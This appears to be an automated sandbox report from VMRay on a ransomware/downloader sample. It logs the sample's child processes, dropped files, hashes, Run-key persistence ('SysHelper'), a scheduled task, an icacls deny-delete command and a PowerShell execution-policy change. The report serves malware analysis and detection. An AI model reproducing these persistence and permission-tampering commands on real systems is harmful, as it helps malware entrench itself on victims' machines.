04526662...91b7 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Downloader, Trojan

Remarks (2/3)

(0x200000e): The overall sleep time of all monitored processes was truncated from "40 seconds" to "10 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

(0x200003a): 2 tasks were rescheduled ahead of time to reveal dormant functionality.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x7b4 Analysis Target High (Elevated) a959.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe" -
#3 0x358 Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x714 Child Process High (Elevated) a959.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x7a8 Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe" #5
#7 0x78c Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe" #5
#8 0x7fc Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe" --Admin #6
#9 0x7b4 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe" #5
#10 0x330 Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #8
#11 0x354 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe" #5
#12 0x830 Created Scheduled Job Medium taskeng.exe taskeng.exe {1F6180C3-866B-4F21-AF81-C0510D25BC0E} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1] #5
#13 0x850 Child Process Medium a959.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --Task #12
#15 0x4d4 Autostart Medium a959.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart -

Behavior Information - Grouped by Category

Process #1: a959.tmp.exe
389 2
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:24, Reason: Analysis Target
Unmonitor End Time: 00:00:43, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x7b4
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7A0
0x 78C
0x 5D0
0x 6E4
0x 114
0x 354
0x 59C
0x 4A4
0x 7CC
0x 7A8
0x 1E8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
a959.tmp.exe 0x00400000 0x00490FFF Relevant Image - 32-bit - False False
buffer 0x00678280 0x006BE377 Marked Executable - 32-bit - False False
buffer 0x00678280 0x006BE377 Content Changed - 32-bit 0x006790C5 False False
buffer 0x00678280 0x006BE377 Content Changed - 32-bit 0x006799E5 False False
a959.tmp.exe 0x00400000 0x00490FFF Process Termination - 32-bit - True False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe 446.50 KB MD5: 3f44e8dde637b81989df3d607fb58526
SHA1: c009f46b4b7db702da474e66760b3ecd02060f3a
SHA256: 045266622416793cd2d5e7617d27a6c9b7fd542dcd3a18dff928b554277791b7
SSDeep: 12288:F0rgZ2xUMGuGWGteiM7QwIHhW4cxZRfQOkpmm9Lkf:FeXGToQBWVYOC9LW
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json 465 bytes MD5: d6727470681ecc2ca56bbd0486b4fa97
SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac
SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613
SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe 446.58 KB MD5: f77e0ab67980f4c77759ee7eae12be69
SHA1: 0dc4fc7d75fed6f674580a823b6ca7c636bb39d4
SHA256: bd105bd4703fcf256822c9dd7b145903117d92e2859df61e62007d8cbf62458c
SSDeep: 12288:jJ8dGdWEcymwIHhW4cxZRfQOkpmm9Lkfc:tKGQECBWVYOC9LWc
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe 446.58 KB MD5: f77e0ab67980f4c77759ee7eae12be69
SHA1: 0dc4fc7d75fed6f674580a823b6ca7c636bb39d4
SHA256: bd105bd4703fcf256822c9dd7b145903117d92e2859df61e62007d8cbf62458c
SSDeep: 12288:jJ8dGdWEcymwIHhW4cxZRfQOkpmm9Lkfc:tKGQECBWVYOC9LWc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB MD5: 6852149628dae385c68c7a9db7028560
SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb
SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4
SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB MD5: 74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5
SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9
SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB MD5: 7bb25f4d28eade2185bd84ebd031cc91
SHA1: a3cc9efe9a8da1575af1ebb6441acbca8bfd2cfc
SHA256: 8f4a8a401fad4978c58d121ad68896e77fbbfd5dae95ea1670249c61e80a82b1
SSDeep: 192:Sm+H5r7SuSySybSzSfSKSoSjSkStSQSCSNSkS2S3SVSBSiSiSNSeS1SPSpMS4ASR:h+H5rVADt+3gXQJ
False
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-07-08T16:48:22 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe True 1
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe - False 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart, size = 214, type = REG_EXPAND_SZ True 1
Fn
Process (46)
»
Operation Process Additional Information Success Count Logfile
Create icacls os_pid = 0x358, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe show_window = SW_SHOW True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\common files\plannedrespondents.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\actor-suggesting.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows media player\knives.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\reward stan distances.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft analysis services\corporations verse fetish.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\merger.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\ideas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\portion-sunday.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio 8\combat_univ.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\paul dancing za.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\artistscomplicated.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\consortiumdressinglou.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\implications cheque folders.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows defender\msie_banners.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\yard-assessing-fraction.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\genre-heaven.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (291)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 3
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74b40000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74b00000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74ae0000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a80000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 3
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b42dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b42f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b43058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74b026e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
